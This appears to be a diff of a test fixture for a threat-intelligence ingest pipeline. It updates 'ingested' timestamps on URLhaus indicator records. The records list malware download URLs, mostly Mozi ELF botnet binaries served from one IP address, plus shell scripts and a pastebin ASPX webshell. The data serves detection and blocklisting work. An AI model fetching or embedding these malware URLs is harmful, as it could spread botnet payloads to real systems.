"{\"id\":\"961045\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961045/\",\"url\":\"http://89.160.20.156:55061/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24542,7 +24542,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028219100Z", + "ingested": "2021-12-14T14:56:15.726608481Z", "original": "{\"id\":\"961040\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961040/\",\"url\":\"http://89.160.20.156:50046/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24591,7 +24591,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028225900Z", + "ingested": "2021-12-14T14:56:15.726608857Z", "original": "{\"id\":\"961041\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961041/\",\"url\":\"http://89.160.20.156:51960/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24640,7 +24640,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028233Z", + "ingested": "2021-12-14T14:56:15.726609712Z", "original": "{\"id\":\"961042\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961042/\",\"url\":\"http://89.160.20.156:42372/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24689,7 +24689,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028239800Z", + "ingested": "2021-12-14T14:56:15.726610134Z", "original": "{\"id\":\"961039\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961039/\",\"url\":\"http://89.160.20.156:51592/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24738,7 +24738,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028246700Z", + "ingested": "2021-12-14T14:56:15.726610628Z", "original": "{\"id\":\"961038\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961038/\",\"url\":\"http://89.160.20.156:35585/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24787,7 +24787,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028255700Z", + "ingested": "2021-12-14T14:56:15.726610991Z", "original": "{\"id\":\"961035\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961035/\",\"url\":\"http://89.160.20.156:38398/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24836,7 +24836,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028263300Z", + "ingested": "2021-12-14T14:56:15.726611357Z", "original": "{\"id\":\"961036\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961036/\",\"url\":\"http://89.160.20.156:59880/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24885,7 +24885,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028270200Z", + "ingested": "2021-12-14T14:56:15.726611730Z", "original": "{\"id\":\"961037\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961037/\",\"url\":\"http://89.160.20.156:39138/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -24935,7 +24935,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028277200Z", + "ingested": "2021-12-14T14:56:15.726612160Z", "original": "{\"id\":\"961033\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961033/\",\"url\":\"http://89.160.20.156:51095/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -24984,7 +24984,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028284200Z", + "ingested": "2021-12-14T14:56:15.726612519Z", "original": "{\"id\":\"961034\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961034/\",\"url\":\"http://89.160.20.156:45117/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:40:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -25033,7 +25033,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028291200Z", + "ingested": "2021-12-14T14:56:15.726612883Z", "original": "{\"id\":\"961032\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961032/\",\"url\":\"http://89.160.20.156:50204/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25082,7 +25082,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028299Z", + "ingested": "2021-12-14T14:56:15.726613247Z", "original": "{\"id\":\"961029\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961029/\",\"url\":\"http://89.160.20.156:45079/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25131,7 +25131,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028306100Z", + "ingested": "2021-12-14T14:56:15.726613795Z", "original": "{\"id\":\"961030\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961030/\",\"url\":\"http://89.160.20.156:52238/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25180,7 +25180,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028313Z", + "ingested": "2021-12-14T14:56:15.726614230Z", "original": "{\"id\":\"961031\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961031/\",\"url\":\"http://89.160.20.156:40312/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25229,7 +25229,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028319900Z", + "ingested": "2021-12-14T14:56:15.726614599Z", "original": "{\"id\":\"961026\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961026/\",\"url\":\"http://89.160.20.156:39002/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25278,7 +25278,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028326800Z", + "ingested": "2021-12-14T14:56:15.726614959Z", "original": "{\"id\":\"961027\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961027/\",\"url\":\"http://89.160.20.156:50773/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25327,7 +25327,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028333700Z", + "ingested": "2021-12-14T14:56:15.726615333Z", "original": "{\"id\":\"961028\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961028/\",\"url\":\"http://89.160.20.156:50050/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25376,7 +25376,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028340600Z", + "ingested": "2021-12-14T14:56:15.726615801Z", "original": "{\"id\":\"961024\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961024/\",\"url\":\"http://89.160.20.156:60081/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25425,7 +25425,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028347500Z", + "ingested": "2021-12-14T14:56:15.726616166Z", "original": "{\"id\":\"961025\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961025/\",\"url\":\"http://89.160.20.156:58177/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25474,7 +25474,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028354800Z", + "ingested": "2021-12-14T14:56:15.726616559Z", "original": "{\"id\":\"961023\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961023/\",\"url\":\"http://89.160.20.156:38589/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25523,7 +25523,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028362400Z", + "ingested": "2021-12-14T14:56:15.726616928Z", "original": "{\"id\":\"961022\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961022/\",\"url\":\"http://89.160.20.156:39229/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25572,7 +25572,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028369400Z", + "ingested": "2021-12-14T14:56:15.726617340Z", "original": "{\"id\":\"961021\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961021/\",\"url\":\"http://89.160.20.156:53595/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25621,7 +25621,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028376700Z", + "ingested": "2021-12-14T14:56:15.726617789Z", "original": "{\"id\":\"961018\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961018/\",\"url\":\"http://89.160.20.156:57279/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25670,7 +25670,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028383700Z", + "ingested": "2021-12-14T14:56:15.726618159Z", "original": "{\"id\":\"961019\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961019/\",\"url\":\"http://89.160.20.156:49019/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25719,7 +25719,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028390300Z", + "ingested": "2021-12-14T14:56:15.726618529Z", "original": "{\"id\":\"961020\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961020/\",\"url\":\"http://89.160.20.156:48558/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25768,7 +25768,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028395Z", + "ingested": "2021-12-14T14:56:15.726618912Z", "original": "{\"id\":\"961017\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961017/\",\"url\":\"http://89.160.20.156:58913/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:25 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25817,7 +25817,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028399900Z", + "ingested": "2021-12-14T14:56:15.726619377Z", "original": "{\"id\":\"961016\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961016/\",\"url\":\"http://89.160.20.156:49608/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25867,7 +25867,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028407100Z", + "ingested": "2021-12-14T14:56:15.726619751Z", "original": "{\"id\":\"961013\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961013/\",\"url\":\"http://89.160.20.156:41143/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -25916,7 +25916,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028414Z", + "ingested": "2021-12-14T14:56:15.726620123Z", "original": "{\"id\":\"961014\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961014/\",\"url\":\"http://89.160.20.156:42129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -25965,7 +25965,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028420900Z", + "ingested": "2021-12-14T14:56:15.726620521Z", "original": "{\"id\":\"961015\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961015/\",\"url\":\"http://89.160.20.156:47403/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26014,7 +26014,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028427900Z", + "ingested": "2021-12-14T14:56:15.726620890Z", "original": "{\"id\":\"961011\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961011/\",\"url\":\"http://89.160.20.156:60187/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26063,7 +26063,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028434800Z", + "ingested": "2021-12-14T14:56:15.726621654Z", "original": "{\"id\":\"961012\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961012/\",\"url\":\"http://89.160.20.156:46097/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26112,7 +26112,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028441700Z", + "ingested": "2021-12-14T14:56:15.726622142Z", "original": "{\"id\":\"961010\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961010/\",\"url\":\"http://89.160.20.156:50771/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:31:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -26158,7 +26158,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028448600Z", + "ingested": "2021-12-14T14:56:15.726622511Z", "original": "{\"id\":\"961009\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961009/\",\"url\":\"https://pastebin.com/raw/00aUJCLx\",\"url_status\":\"offline\",\"host\":\"pastebin.com\",\"date_added\":\"2021-01-14 16:29:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"pmelson\",\"larted\":\"false\",\"tags\":[\"ASPXShell\",\"webshell\"]}", "category": "threat", "type": "indicator", @@ -26208,7 +26208,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028455600Z", + "ingested": "2021-12-14T14:56:15.726622879Z", "original": "{\"id\":\"961008\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961008/\",\"url\":\"http://89.160.20.156:45117/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:25:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -26257,7 +26257,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028462600Z", + "ingested": "2021-12-14T14:56:15.726623374Z", "original": "{\"id\":\"961007\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961007/\",\"url\":\"http://89.160.20.156:41485/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26306,7 +26306,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028470100Z", + "ingested": "2021-12-14T14:56:15.726623784Z", "original": "{\"id\":\"961006\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961006/\",\"url\":\"http://89.160.20.156:43851/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26355,7 +26355,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028477500Z", + "ingested": "2021-12-14T14:56:15.726624156Z", "original": "{\"id\":\"961005\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961005/\",\"url\":\"http://89.160.20.156:37095/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26404,7 +26404,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028484500Z", + "ingested": "2021-12-14T14:56:15.726624519Z", "original": "{\"id\":\"961004\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961004/\",\"url\":\"http://89.160.20.156:59275/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26453,7 +26453,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028491400Z", + "ingested": "2021-12-14T14:56:15.726624902Z", "original": "{\"id\":\"961002\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961002/\",\"url\":\"http://89.160.20.156:46131/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26502,7 +26502,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028498300Z", + "ingested": "2021-12-14T14:56:15.726625361Z", "original": "{\"id\":\"961003\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961003/\",\"url\":\"http://89.160.20.156:40129/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26551,7 +26551,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028505200Z", + "ingested": "2021-12-14T14:56:15.726625730Z", "original": "{\"id\":\"961000\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961000/\",\"url\":\"http://89.160.20.156:43924/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -26600,7 +26600,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028512200Z", + "ingested": "2021-12-14T14:56:15.726626099Z", "original": "{\"id\":\"961001\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961001/\",\"url\":\"http://89.160.20.156:38851/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -26649,7 +26649,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028519100Z", + "ingested": "2021-12-14T14:56:15.726626470Z", "original": 